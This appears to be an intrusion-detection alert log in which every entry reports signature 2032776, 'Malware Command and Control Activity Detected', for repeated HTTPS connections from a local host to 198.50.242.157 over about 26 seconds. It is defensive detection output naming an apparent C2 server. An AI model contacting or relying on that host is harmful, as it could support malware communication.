2025-01-11T20:07:38.248909+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49780	198.50.242.157	443	TCP
2025-01-11T20:07:39.022812+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49781	198.50.242.157	443	TCP
2025-01-11T20:07:39.773188+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49782	198.50.242.157	443	TCP
2025-01-11T20:07:40.507209+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49783	198.50.242.157	443	TCP
2025-01-11T20:07:41.210066+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49784	198.50.242.157	443	TCP
2025-01-11T20:07:41.882445+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49785	198.50.242.157	443	TCP
2025-01-11T20:07:42.538183+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49786	198.50.242.157	443	TCP
2025-01-11T20:07:43.163423+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49787	198.50.242.157	443	TCP
2025-01-11T20:07:43.772801+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49788	198.50.242.157	443	TCP
2025-01-11T20:07:44.366401+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49789	198.50.242.157	443	TCP
2025-01-11T20:07:45.949450+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49790	198.50.242.157	443	TCP
2025-01-11T20:07:46.506853+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49791	198.50.242.157	443	TCP
2025-01-11T20:07:47.038314+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49792	198.50.242.157	443	TCP
2025-01-11T20:07:47.554168+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49793	198.50.242.157	443	TCP
2025-01-11T20:07:48.054160+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49794	198.50.242.157	443	TCP
2025-01-11T20:07:48.560804+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49795	198.50.242.157	443	TCP
2025-01-11T20:07:49.241191+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49796	198.50.242.157	443	TCP
2025-01-11T20:07:49.694331+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49797	198.50.242.157	443	TCP
2025-01-11T20:07:50.131834+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49798	198.50.242.157	443	TCP
2025-01-11T20:07:50.553678+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49799	198.50.242.157	443	TCP
2025-01-11T20:07:50.975500+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49800	198.50.242.157	443	TCP
2025-01-11T20:07:51.366120+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49801	198.50.242.157	443	TCP
2025-01-11T20:07:51.756897+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49802	198.50.242.157	443	TCP
2025-01-11T20:07:52.131699+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49803	198.50.242.157	443	TCP
2025-01-11T20:07:52.491125+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49804	198.50.242.157	443	TCP
2025-01-11T20:07:52.835277+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49806	198.50.242.157	443	TCP
2025-01-11T20:07:53.200425+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49807	198.50.242.157	443	TCP
2025-01-11T20:07:53.522350+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49808	198.50.242.157	443	TCP
2025-01-11T20:07:53.834851+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49809	198.50.242.157	443	TCP
2025-01-11T20:07:54.131663+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49810	198.50.242.157	443	TCP
2025-01-11T20:07:54.428650+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49811	198.50.242.157	443	TCP
2025-01-11T20:07:54.709948+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49813	198.50.242.157	443	TCP
2025-01-11T20:07:54.991191+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49814	198.50.242.157	443	TCP
2025-01-11T20:07:55.256819+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49815	198.50.242.157	443	TCP
2025-01-11T20:07:55.522514+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49816	198.50.242.157	443	TCP
2025-01-11T20:07:55.788232+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49822	198.50.242.157	443	TCP
2025-01-11T20:07:56.038318+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49823	198.50.242.157	443	TCP
2025-01-11T20:07:56.272256+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49824	198.50.242.157	443	TCP
2025-01-11T20:07:56.490942+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49826	198.50.242.157	443	TCP
2025-01-11T20:07:56.709913+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49831	198.50.242.157	443	TCP
2025-01-11T20:07:56.928695+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49832	198.50.242.157	443	TCP
2025-01-11T20:07:57.132059+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49833	198.50.242.157	443	TCP
2025-01-11T20:07:57.334835+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49838	198.50.242.157	443	TCP
2025-01-11T20:07:57.522578+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49840	198.50.242.157	443	TCP
2025-01-11T20:07:57.709956+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49841	198.50.242.157	443	TCP
2025-01-11T20:07:57.897520+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49842	198.50.242.157	443	TCP
2025-01-11T20:07:58.069240+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49847	198.50.242.157	443	TCP
2025-01-11T20:07:58.240984+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49849	198.50.242.157	443	TCP
2025-01-11T20:07:58.397391+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49850	198.50.242.157	443	TCP
2025-01-11T20:07:58.553605+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49851	198.50.242.157	443	TCP
2025-01-11T20:07:58.710092+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49852	198.50.242.157	443	TCP
2025-01-11T20:07:58.866135+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49857	198.50.242.157	443	TCP
2025-01-11T20:07:59.006919+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49859	198.50.242.157	443	TCP
2025-01-11T20:07:59.147614+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49860	198.50.242.157	443	TCP
2025-01-11T20:07:59.288673+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49861	198.50.242.157	443	TCP
2025-01-11T20:07:59.413400+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49862	198.50.242.157	443	TCP
2025-01-11T20:07:59.553643+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49864	198.50.242.157	443	TCP
2025-01-11T20:07:59.678702+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49868	198.50.242.157	443	TCP
2025-01-11T20:07:59.803734+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49870	198.50.242.157	443	TCP
2025-01-11T20:07:59.912874+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49871	198.50.242.157	443	TCP
2025-01-11T20:08:00.022317+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49872	198.50.242.157	443	TCP
2025-01-11T20:08:00.131800+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49873	198.50.242.157	443	TCP
2025-01-11T20:08:00.240996+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49874	198.50.242.157	443	TCP
2025-01-11T20:08:00.350344+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49878	198.50.242.157	443	TCP
2025-01-11T20:08:00.459813+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49881	198.50.242.157	443	TCP
2025-01-11T20:08:00.553577+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49882	198.50.242.157	443	TCP
2025-01-11T20:08:00.647468+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49883	198.50.242.157	443	TCP
2025-01-11T20:08:00.740943+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49884	198.50.242.157	443	TCP
2025-01-11T20:08:00.834871+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49885	198.50.242.157	443	TCP
2025-01-11T20:08:00.912984+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49886	198.50.242.157	443	TCP
2025-01-11T20:08:00.990967+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49887	198.50.242.157	443	TCP
2025-01-11T20:08:01.069095+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49888	198.50.242.157	443	TCP
2025-01-11T20:08:01.149781+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49892	198.50.242.157	443	TCP
2025-01-11T20:08:01.225533+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49894	198.50.242.157	443	TCP
2025-01-11T20:08:01.303719+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49896	198.50.242.157	443	TCP
2025-01-11T20:08:01.404129+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49897	198.50.242.157	443	TCP
2025-01-11T20:08:01.481613+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49898	198.50.242.157	443	TCP
2025-01-11T20:08:01.632100+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49899	198.50.242.157	443	TCP
2025-01-11T20:08:01.709866+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49900	198.50.242.157	443	TCP
2025-01-11T20:08:01.772821+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49901	198.50.242.157	443	TCP
2025-01-11T20:08:01.834883+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49903	198.50.242.157	443	TCP
2025-01-11T20:08:01.897179+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49906	198.50.242.157	443	TCP
2025-01-11T20:08:01.959695+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49908	198.50.242.157	443	TCP
2025-01-11T20:08:02.022260+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49910	198.50.242.157	443	TCP
2025-01-11T20:08:02.084685+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49911	198.50.242.157	443	TCP
2025-01-11T20:08:02.132150+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49912	198.50.242.157	443	TCP
2025-01-11T20:08:02.178472+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49913	198.50.242.157	443	TCP
2025-01-11T20:08:02.225438+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49914	198.50.242.157	443	TCP
2025-01-11T20:08:02.275082+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49915	198.50.242.157	443	TCP
2025-01-11T20:08:02.319526+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49916	198.50.242.157	443	TCP
2025-01-11T20:08:02.366197+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49917	198.50.242.157	443	TCP
2025-01-11T20:08:02.413069+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49918	198.50.242.157	443	TCP
2025-01-11T20:08:02.459776+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49919	198.50.242.157	443	TCP
2025-01-11T20:08:02.506903+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49920	198.50.242.157	443	TCP
2025-01-11T20:08:02.553755+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49921	198.50.242.157	443	TCP
2025-01-11T20:08:02.603544+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49924	198.50.242.157	443	TCP
2025-01-11T20:08:02.651580+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49925	198.50.242.157	443	TCP
2025-01-11T20:08:02.694068+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49927	198.50.242.157	443	TCP
2025-01-11T20:08:02.725529+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49928	198.50.242.157	443	TCP
2025-01-11T20:08:02.756544+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49931	198.50.242.157	443	TCP
2025-01-11T20:08:02.788077+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49932	198.50.242.157	443	TCP
2025-01-11T20:08:02.824863+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49933	198.50.242.157	443	TCP
2025-01-11T20:08:02.866713+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49934	198.50.242.157	443	TCP
2025-01-11T20:08:02.897339+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49935	198.50.242.157	443	TCP
2025-01-11T20:08:02.928650+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49936	198.50.242.157	443	TCP
2025-01-11T20:08:02.959852+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49937	198.50.242.157	443	TCP
2025-01-11T20:08:02.991018+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49938	198.50.242.157	443	TCP
2025-01-11T20:08:03.022363+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49939	198.50.242.157	443	TCP
2025-01-11T20:08:03.053439+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49940	198.50.242.157	443	TCP
2025-01-11T20:08:03.087871+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49941	198.50.242.157	443	TCP
2025-01-11T20:08:03.117155+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49942	198.50.242.157	443	TCP
2025-01-11T20:08:03.147516+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49943	198.50.242.157	443	TCP
2025-01-11T20:08:03.178885+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49944	198.50.242.157	443	TCP
2025-01-11T20:08:03.210196+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49945	198.50.242.157	443	TCP
2025-01-11T20:08:03.241646+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49946	198.50.242.157	443	TCP
2025-01-11T20:08:03.272173+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49947	198.50.242.157	443	TCP
2025-01-11T20:08:03.303483+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49948	198.50.242.157	443	TCP
2025-01-11T20:08:03.334619+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49949	198.50.242.157	443	TCP
2025-01-11T20:08:03.350349+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49950	198.50.242.157	443	TCP
2025-01-11T20:08:03.365991+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49951	198.50.242.157	443	TCP
2025-01-11T20:08:03.397270+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49954	198.50.242.157	443	TCP
2025-01-11T20:08:03.412730+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49955	198.50.242.157	443	TCP
2025-01-11T20:08:03.428651+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49956	198.50.242.157	443	TCP
2025-01-11T20:08:03.447062+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49957	198.50.242.157	443	TCP
2025-01-11T20:08:03.478402+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49958	198.50.242.157	443	TCP
2025-01-11T20:08:03.534557+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49961	198.50.242.157	443	TCP
2025-01-11T20:08:03.554085+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49963	198.50.242.157	443	TCP
2025-01-11T20:08:03.569178+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49964	198.50.242.157	443	TCP
2025-01-11T20:08:03.584759+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49965	198.50.242.157	443	TCP
2025-01-11T20:08:03.600277+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49966	198.50.242.157	443	TCP
2025-01-11T20:08:03.616290+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49967	198.50.242.157	443	TCP
2025-01-11T20:08:03.631591+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49968	198.50.242.157	443	TCP
2025-01-11T20:08:03.647233+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49969	198.50.242.157	443	TCP
2025-01-11T20:08:03.663155+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49970	198.50.242.157	443	TCP
2025-01-11T20:08:03.679502+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49971	198.50.242.157	443	TCP
2025-01-11T20:08:03.694875+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49972	198.50.242.157	443	TCP
2025-01-11T20:08:03.714487+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49973	198.50.242.157	443	TCP
2025-01-11T20:08:03.741079+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49974	198.50.242.157	443	TCP
2025-01-11T20:08:03.757057+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49975	198.50.242.157	443	TCP
2025-01-11T20:08:03.772435+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49976	198.50.242.157	443	TCP
2025-01-11T20:08:03.787898+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49977	198.50.242.157	443	TCP
2025-01-11T20:08:03.803504+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49978	198.50.242.157	443	TCP
2025-01-11T20:08:03.821830+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49979	198.50.242.157	443	TCP
2025-01-11T20:08:03.834832+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49980	198.50.242.157	443	TCP
2025-01-11T20:08:03.853649+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49981	198.50.242.157	443	TCP
2025-01-11T20:08:03.877356+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49982	198.50.242.157	443	TCP
2025-01-11T20:08:03.897533+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49983	198.50.242.157	443	TCP
2025-01-11T20:08:03.913003+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49984	198.50.242.157	443	TCP
2025-01-11T20:08:03.928476+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49985	198.50.242.157	443	TCP
2025-01-11T20:08:03.944155+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49986	198.50.242.157	443	TCP
2025-01-11T20:08:03.960039+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49987	198.50.242.157	443	TCP
2025-01-11T20:08:03.975345+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49988	198.50.242.157	443	TCP
2025-01-11T20:08:03.991112+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49989	198.50.242.157	443	TCP
2025-01-11T20:08:04.006586+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49990	198.50.242.157	443	TCP
2025-01-11T20:08:04.022366+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49991	198.50.242.157	443	TCP
2025-01-11T20:08:04.038252+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49992	198.50.242.157	443	TCP
2025-01-11T20:08:04.053715+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49993	198.50.242.157	443	TCP
2025-01-11T20:08:04.070575+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49994	198.50.242.157	443	TCP
2025-01-11T20:08:04.084654+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49995	198.50.242.157	443	TCP
2025-01-11T20:08:04.101183+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49996	198.50.242.157	443	TCP
2025-01-11T20:08:04.116020+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49997	198.50.242.157	443	TCP
2025-01-11T20:08:04.131556+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49999	198.50.242.157	443	TCP
2025-01-11T20:08:04.147098+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50000	198.50.242.157	443	TCP
2025-01-11T20:08:04.165771+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50002	198.50.242.157	443	TCP
2025-01-11T20:08:04.178524+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50003	198.50.242.157	443	TCP
2025-01-11T20:08:04.197042+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50004	198.50.242.157	443	TCP
2025-01-11T20:08:04.220483+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50005	198.50.242.157	443	TCP
2025-01-11T20:08:04.225398+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50006	198.50.242.157	443	TCP
2025-01-11T20:08:04.241175+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50007	198.50.242.157	443	TCP
2025-01-11T20:08:04.256529+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50010	198.50.242.157	443	TCP
2025-01-11T20:08:04.272227+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50011	198.50.242.157	443	TCP
2025-01-11T20:08:04.288367+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50012	198.50.242.157	443	TCP
2025-01-11T20:08:04.303646+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50013	198.50.242.157	443	TCP
2025-01-11T20:08:04.319421+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50014	198.50.242.157	443	TCP
2025-01-11T20:08:04.334746+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50016	198.50.242.157	443	TCP
2025-01-11T20:08:04.350361+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50017	198.50.242.157	443	TCP
2025-01-11T20:08:04.366665+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50018	198.50.242.157	443	TCP
2025-01-11T20:08:04.382195+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50019	198.50.242.157	443	TCP
2025-01-11T20:08:04.397460+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50020	198.50.242.157	443	TCP
2025-01-11T20:08:04.412957+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50021	198.50.242.157	443	TCP
2025-01-11T20:08:04.428402+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50022	198.50.242.157	443	TCP
2025-01-11T20:08:04.444097+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50023	198.50.242.157	443	TCP
2025-01-11T20:08:04.459825+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50024	198.50.242.157	443	TCP
2025-01-11T20:08:04.475285+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50025	198.50.242.157	443	TCP
2025-01-11T20:08:04.490891+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50026	198.50.242.157	443	TCP
2025-01-11T20:08:04.509036+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50027	198.50.242.157	443	TCP
2025-01-11T20:08:04.524492+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50028	198.50.242.157	443	TCP
2025-01-11T20:08:04.538512+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50029	198.50.242.157	443	TCP
2025-01-11T20:08:04.553450+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50030	198.50.242.157	443	TCP
2025-01-11T20:08:04.569055+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50031	198.50.242.157	443	TCP
2025-01-11T20:08:04.584670+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50032	198.50.242.157	443	TCP
2025-01-11T20:08:04.600445+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50033	198.50.242.157	443	TCP
2025-01-11T20:08:04.616935+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50034	198.50.242.157	443	TCP
2025-01-11T20:08:04.631881+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50035	198.50.242.157	443	TCP
2025-01-11T20:08:04.647156+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50036	198.50.242.157	443	TCP
2025-01-11T20:08:04.663504+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50037	198.50.242.157	443	TCP
2025-01-11T20:08:04.680356+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50038	198.50.242.157	443	TCP
2025-01-11T20:08:04.694216+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50039	198.50.242.157	443	TCP
2025-01-11T20:08:04.710152+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50040	198.50.242.157	443	TCP
2025-01-11T20:08:04.725906+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50041	198.50.242.157	443	TCP
2025-01-11T20:08:04.740908+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50042	198.50.242.157	443	TCP
2025-01-11T20:08:04.756542+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50043	198.50.242.157	443	TCP
2025-01-11T20:08:04.772575+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50044	198.50.242.157	443	TCP
2025-01-11T20:08:04.788222+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50045	198.50.242.157	443	TCP
2025-01-11T20:08:04.803606+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50046	198.50.242.157	443	TCP
2025-01-11T20:08:04.818970+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50047	198.50.242.157	443	TCP
2025-01-11T20:08:04.834799+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50048	198.50.242.157	443	TCP
2025-01-11T20:08:04.852574+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50049	198.50.242.157	443	TCP
2025-01-11T20:08:04.875173+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50050	198.50.242.157	443	TCP
2025-01-11T20:08:04.890576+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50051	198.50.242.157	443	TCP
2025-01-11T20:08:04.897692+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50052	198.50.242.157	443	TCP
2025-01-11T20:08:04.912785+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50054	198.50.242.157	443	TCP
2025-01-11T20:08:04.928466+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50056	198.50.242.157	443	TCP
2025-01-11T20:08:04.929425+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50057	198.50.242.157	443	TCP
2025-01-11T20:08:04.930471+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50058	198.50.242.157	443	TCP
2025-01-11T20:08:04.931790+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50059	198.50.242.157	443	TCP
2025-01-11T20:08:04.932928+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50060	198.50.242.157	443	TCP
2025-01-11T20:08:04.934654+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50061	198.50.242.157	443	TCP
2025-01-11T20:08:04.935427+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50062	198.50.242.157	443	TCP
2025-01-11T20:08:04.936490+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50063	198.50.242.157	443	TCP
2025-01-11T20:08:04.937605+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50064	198.50.242.157	443	TCP
2025-01-11T20:08:04.938680+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50065	198.50.242.157	443	TCP
2025-01-11T20:08:04.940281+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50066	198.50.242.157	443	TCP
2025-01-11T20:08:04.941459+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50067	198.50.242.157	443	TCP
2025-01-11T20:08:04.942461+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50068	198.50.242.157	443	TCP
2025-01-11T20:08:04.944008+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50069	198.50.242.157	443	TCP
2025-01-11T20:08:04.945346+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50070	198.50.242.157	443	TCP
2025-01-11T20:08:04.946568+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50071	198.50.242.157	443	TCP
2025-01-11T20:08:04.947908+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50072	198.50.242.157	443	TCP
2025-01-11T20:08:04.948909+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50073	198.50.242.157	443	TCP
